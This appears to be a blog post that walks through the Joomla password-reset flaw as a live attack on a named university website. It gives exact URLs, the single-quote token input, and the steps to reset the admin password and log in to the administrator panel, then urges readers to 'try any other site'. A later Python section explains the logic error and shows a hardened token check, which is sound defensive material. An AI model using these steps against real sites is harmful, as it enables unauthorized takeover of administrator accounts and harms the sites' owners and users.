Joomla Password Reset Vulnerability: Explained with a Live Demo
website : http://miit.unikl.edu.my/
The trick works like this:
1. Go to http://miit.unikl.edu.my/index.php?option=com_user&view=reset&layout=confirm
You will then be prompted for a token, which is supposed to have already been sent to your email.
2. Now, put a single quote ' into the "token" text box and click OK. The SQL query will then look like this:
"SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
3. Write a new password for admin.
4. Go to the URL: http://miit.unikl.edu.my/administrator/
5. Log in as admin with your new password.
** Update: the miit Joomla site has been patched. Try any other site :P
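Why the query in step 2 matches the admin account, and a check that stops it, shown as an added example (not code from this post or from Joomla). It assumes the form filter strips non-alphanumeric characters and that real tokens are 32 alphanumeric characters; the sample rows are constructed and the function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows; table and columns follow the query quoted above.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jos_users "
               "(id INTEGER, username TEXT, block INTEGER, activation TEXT)")
    db.executemany("INSERT INTO jos_users VALUES (?, ?, ?, ?)", [
        (62, "admin", 0, ""),          # no reset pending: activation is empty
        (63, "alice", 0, "a" * 32),    # reset pending (constructed token)
        (64, "mallory", 1, ""),        # blocked account
    ])
    return db

QUERY = "SELECT id FROM jos_users WHERE block = 0 AND activation = ?"

def sanitize(token):
    # Assumption: the input filter keeps only alphanumeric characters,
    # so a lone single quote becomes the empty string.
    return re.sub(r"[^A-Za-z0-9]", "", token)

def lookup_weak(db, token):
    # Weak: the filtered token is never checked for emptiness, so it
    # matches any unblocked user whose activation column is empty.
    row = db.execute(QUERY, (sanitize(token),)).fetchone()
    return row[0] if row else None

# Assumption: a valid token is exactly 32 alphanumeric characters.
TOKEN_RE = re.compile(r"[A-Za-z0-9]{32}")

def lookup_hardened(db, token):
    # Hardened: reject malformed input before touching the database and
    # compare the raw value, not a silently filtered copy.
    if not isinstance(token, str) or not TOKEN_RE.fullmatch(token):
        return None
    row = db.execute(QUERY, (token,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    for t in ["'", "", "a" * 32]:
        print(repr(t), lookup_weak(db, t), lookup_hardened(db, t))
```

Both lookups use a bound parameter, which isolates the flaw: this is a logic error (an empty token is accepted), not a quoting problem, so parameterised queries alone do not fix it.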